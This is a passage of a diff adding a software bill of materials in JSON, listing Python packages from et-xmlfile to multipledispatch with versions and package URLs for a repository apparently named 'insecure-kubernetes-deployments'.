{ + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "et-xmlfile", + "version": "1.1.0", + "purl": "pkg:pypi/et-xmlfile@1.1.0", + "type": "library", + "bom-ref": "pkg:pypi/et-xmlfile@1.1.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "executing", + "version": "latest", + "purl": "pkg:pypi/executing@latest", + "type": "library", + "bom-ref": "pkg:pypi/executing@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "fastjsonschema", + "version": "latest", + "purl": "pkg:pypi/fastjsonschema@latest", + "type": "library", + "bom-ref": "pkg:pypi/fastjsonschema@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "filelock", + "version": "latest", + "purl": "pkg:pypi/filelock@latest", + "type": "library", + "bom-ref": "pkg:pypi/filelock@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "flake8", + "version": "latest", + "purl": "pkg:pypi/flake8@latest", + "type": "library", + "bom-ref": "pkg:pypi/flake8@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "flask", + "version": "3.0.2", + "purl": "pkg:pypi/flask@3.0.2", + "type": "framework", + "bom-ref": "pkg:pypi/flask@3.0.2", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "fonttools", + "version": "4.25.0", + "purl": "pkg:pypi/fonttools@4.25.0", + "type": "library", + "bom-ref": "pkg:pypi/fonttools@4.25.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "fsspec", + "version": "latest", + "purl": "pkg:pypi/fsspec@latest", + "type": "library", + "bom-ref": "pkg:pypi/fsspec@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "future", + "version": "latest", + "purl": "pkg:pypi/future@latest", + "type": "library", + "bom-ref": "pkg:pypi/future@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "gensim", + "version": "latest", + "purl": "pkg:pypi/gensim@latest", + "type": "library", + "bom-ref": "pkg:pypi/gensim@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "glob2", + "version": "latest", + "purl": "pkg:pypi/glob2@latest", + "type": "library", + "bom-ref": "pkg:pypi/glob2@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "gmpy2", + "version": "latest", + "purl": "pkg:pypi/gmpy2@latest", + "type": "library", + "bom-ref": "pkg:pypi/gmpy2@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "h5py", + "version": "latest", + "purl": "pkg:pypi/h5py@latest", + "type": "library", + "bom-ref": "pkg:pypi/h5py@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "holoviews", + "version": "latest", + "purl": "pkg:pypi/holoviews@latest", + "type": "library", + "bom-ref": "pkg:pypi/holoviews@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "huggingface-hub", + "version": "latest", + "purl": "pkg:pypi/huggingface-hub@latest", + "type": "framework", + "bom-ref": "pkg:pypi/huggingface-hub@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "hvplot", + "version": "latest", + "purl": "pkg:pypi/hvplot@latest", + "type": "library", + "bom-ref": "pkg:pypi/hvplot@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "imagecodecs", + "version": "latest", + "purl": "pkg:pypi/imagecodecs@latest", + "type": "library", + "bom-ref": "pkg:pypi/imagecodecs@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "imageio", + "version": "latest", + "purl": "pkg:pypi/imageio@latest", + "type": "library", + "bom-ref": "pkg:pypi/imageio@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "imbalanced-learn", + "version": "latest", + "purl": "pkg:pypi/imbalanced-learn@latest", + "type": "library", + "bom-ref": "pkg:pypi/imbalanced-learn@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "importlib-metadata", + "version": "latest", + "purl": "pkg:pypi/importlib-metadata@latest", + "type": "library", + "bom-ref": "pkg:pypi/importlib-metadata@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "inflection", + "version": "0.5.1", + "purl": "pkg:pypi/inflection@0.5.1", + "type": "library", + "bom-ref": "pkg:pypi/inflection@0.5.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "iniconfig", + "version": "latest", + "purl": "pkg:pypi/iniconfig@latest", + "type": "library", + "bom-ref": "pkg:pypi/iniconfig@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "intervaltree", + "version": "latest", + "purl": "pkg:pypi/intervaltree@latest", + "type": "library", + "bom-ref": "pkg:pypi/intervaltree@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "ipykernel", + "version": "latest", + "purl": "pkg:pypi/ipykernel@latest", + "type": "library", + "bom-ref": "pkg:pypi/ipykernel@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "ipython", + "version": "latest", + "purl": "pkg:pypi/ipython@latest", + "type": "library", + "bom-ref": "pkg:pypi/ipython@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "ipython-genutils", + "version": "latest", + "purl": "pkg:pypi/ipython-genutils@latest", + "type": "library", + "bom-ref": "pkg:pypi/ipython-genutils@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "ipywidgets", + "version": "latest", + "purl": "pkg:pypi/ipywidgets@latest", + "type": "library", + "bom-ref": "pkg:pypi/ipywidgets@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "isort", + "version": "latest", + "purl": "pkg:pypi/isort@latest", + "type": "library", + "bom-ref": "pkg:pypi/isort@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "itsdangerous", + "version": "2.2.0", + "purl": "pkg:pypi/itsdangerous@2.2.0", + "type": "library", + "bom-ref": "pkg:pypi/itsdangerous@2.2.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "jaraco.classes", + "version": "latest", + "purl": "pkg:pypi/jaraco.classes@latest", + "type": "library", + "bom-ref": "pkg:pypi/jaraco.classes@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "jedi", + "version": "latest", + "purl": "pkg:pypi/jedi@latest", + "type": "library", + "bom-ref": "pkg:pypi/jedi@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "jellyfish", + "version": "latest", + "purl": "pkg:pypi/jellyfish@latest", + "type": "library", + "bom-ref": "pkg:pypi/jellyfish@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "jinja2-time", + "version": "latest", + "purl": "pkg:pypi/jinja2-time@latest", + "type": "library", + "bom-ref": "pkg:pypi/jinja2-time@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "jmespath", + "version": "latest", + "purl": "pkg:pypi/jmespath@latest", + "type": "library", + "bom-ref": "pkg:pypi/jmespath@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "joblib", + "version": "latest", + "purl": "pkg:pypi/joblib@latest", + "type": "library", + "bom-ref": "pkg:pypi/joblib@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "json5", + "version": "latest", + "purl": "pkg:pypi/json5@latest", + "type": "library", + "bom-ref": "pkg:pypi/json5@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "jsonpatch", + "version": "latest", + "purl": "pkg:pypi/jsonpatch@latest", + "type": "library", + "bom-ref": "pkg:pypi/jsonpatch@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "jsonschema", + "version": "latest", + "purl": "pkg:pypi/jsonschema@latest", + "type": "library", + "bom-ref": "pkg:pypi/jsonschema@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "jupyter", + "version": "latest", + "purl": "pkg:pypi/jupyter@latest", + "type": "library", + "bom-ref": "pkg:pypi/jupyter@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "jupyter-client", + "version": "latest", + "purl": "pkg:pypi/jupyter-client@latest", + "type": "library", + "bom-ref": "pkg:pypi/jupyter-client@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "jupyter-console", + "version": "latest", + "purl": "pkg:pypi/jupyter-console@latest", + "type": "library", + "bom-ref": "pkg:pypi/jupyter-console@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "jupyter-core", + "version": "latest", + "purl": "pkg:pypi/jupyter-core@latest", + "type": "library", + "bom-ref": "pkg:pypi/jupyter-core@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "jupyter-events", + "version": "latest", + "purl": "pkg:pypi/jupyter-events@latest", + "type": "library", + "bom-ref": "pkg:pypi/jupyter-events@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "jupyter-server", + "version": "latest", + "purl": "pkg:pypi/jupyter-server@latest", + "type": "library", + "bom-ref": "pkg:pypi/jupyter-server@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "jupyter-server-fileid", + "version": "latest", + "purl": "pkg:pypi/jupyter-server-fileid@latest", + "type": "library", + "bom-ref": "pkg:pypi/jupyter-server-fileid@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "jupyter-server-ydoc", + "version": "latest", + "purl": "pkg:pypi/jupyter-server-ydoc@latest", + "type": "library", + "bom-ref": "pkg:pypi/jupyter-server-ydoc@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "jupyter-ydoc", + "version": "latest", + "purl": "pkg:pypi/jupyter-ydoc@latest", + "type": "library", + "bom-ref": "pkg:pypi/jupyter-ydoc@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "jupyterlab", + "version": "latest", + "purl": "pkg:pypi/jupyterlab@latest", + "type": "library", + "bom-ref": "pkg:pypi/jupyterlab@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "jupyterlab-pygments", + "version": "latest", + "purl": "pkg:pypi/jupyterlab-pygments@latest", + "type": "library", + "bom-ref": "pkg:pypi/jupyterlab-pygments@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "jupyterlab-server", + "version": "latest", + "purl": "pkg:pypi/jupyterlab-server@latest", + "type": "library", + "bom-ref": "pkg:pypi/jupyterlab-server@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "jupyterlab-widgets", + "version": "latest", + "purl": "pkg:pypi/jupyterlab-widgets@latest", + "type": "library", + "bom-ref": "pkg:pypi/jupyterlab-widgets@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "kaleido", + "version": "latest", + "purl": "pkg:pypi/kaleido@latest", + "type": "library", + "bom-ref": "pkg:pypi/kaleido@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "kiwisolver", + "version": "latest", + "purl": "pkg:pypi/kiwisolver@latest", + "type": "library", + "bom-ref": "pkg:pypi/kiwisolver@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "lazy-loader", + "version": "latest", + "purl": "pkg:pypi/lazy-loader@latest", + "type": "library", + "bom-ref": "pkg:pypi/lazy-loader@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "lazy-object-proxy", + "version": "latest", + "purl": "pkg:pypi/lazy-object-proxy@latest", + "type": "library", + "bom-ref": "pkg:pypi/lazy-object-proxy@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "libarchive-c", + "version": "latest", + "purl": "pkg:pypi/libarchive-c@latest", + "type": "framework", + "bom-ref": "pkg:pypi/libarchive-c@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "libmambapy", + "version": "latest", + "purl": "pkg:pypi/libmambapy@latest", + "type": "library", + "bom-ref": "pkg:pypi/libmambapy@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "linkify-it-py", + "version": "latest", + "purl": "pkg:pypi/linkify-it-py@latest", + "type": "library", + "bom-ref": "pkg:pypi/linkify-it-py@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "llvmlite", + "version": "latest", + "purl": "pkg:pypi/llvmlite@latest", + "type": "library", + "bom-ref": "pkg:pypi/llvmlite@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "lmdb", + "version": "latest", + "purl": "pkg:pypi/lmdb@latest", + "type": "library", + "bom-ref": "pkg:pypi/lmdb@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "locket", + "version": "latest", + "purl": "pkg:pypi/locket@latest", + "type": "library", + "bom-ref": "pkg:pypi/locket@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "lz4", + "version": "latest", + "purl": "pkg:pypi/lz4@latest", + "type": "library", + "bom-ref": "pkg:pypi/lz4@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "markdown-it-py", + "version": "latest", + "purl": "pkg:pypi/markdown-it-py@latest", + "type": "library", + "bom-ref": "pkg:pypi/markdown-it-py@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "matplotlib", + "version": "latest", + "purl": "pkg:pypi/matplotlib@latest", + "type": "framework", + "bom-ref": "pkg:pypi/matplotlib@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "matplotlib-inline", + "version": "latest", + "purl": "pkg:pypi/matplotlib-inline@latest", + "type": "framework", + "bom-ref": "pkg:pypi/matplotlib-inline@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "mccabe", + "version": "latest", + "purl": "pkg:pypi/mccabe@latest", + "type": "library", + "bom-ref": "pkg:pypi/mccabe@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "mdit-py-plugins", + "version": "latest", + "purl": "pkg:pypi/mdit-py-plugins@latest", + "type": "library", + "bom-ref": "pkg:pypi/mdit-py-plugins@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "mdurl", + "version": "latest", + "purl": "pkg:pypi/mdurl@latest", + "type": "library", + "bom-ref": "pkg:pypi/mdurl@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "mistune", + "version": "latest", + "purl": "pkg:pypi/mistune@latest", + "type": "library", + "bom-ref": "pkg:pypi/mistune@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "mkl-fft", + "version": "latest", + "purl": "pkg:pypi/mkl-fft@latest", + "type": "library", + "bom-ref": "pkg:pypi/mkl-fft@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "mkl-random", + "version": "latest", + "purl": "pkg:pypi/mkl-random@latest", + "type": "library", + "bom-ref": "pkg:pypi/mkl-random@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "mkl-service", + "version": "2.4.0", + "purl": "pkg:pypi/mkl-service@2.4.0", + "type": "library", + "bom-ref": "pkg:pypi/mkl-service@2.4.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "more-itertools", + "version": "latest", + "purl": "pkg:pypi/more-itertools@latest", + "type": "library", + "bom-ref": "pkg:pypi/more-itertools@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "mpmath", + "version": "latest", + "purl": "pkg:pypi/mpmath@latest", + "type": "library", + "bom-ref": "pkg:pypi/mpmath@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "msgpack", + "version": "latest", + "purl": "pkg:pypi/msgpack@latest", + "type": "library", + "bom-ref": "pkg:pypi/msgpack@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "multidict", + "version": "latest", + "purl": "pkg:pypi/multidict@latest", + "type": "library", + "bom-ref": "pkg:pypi/multidict@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "multipledispatch", + "version": "latest", + "purl": 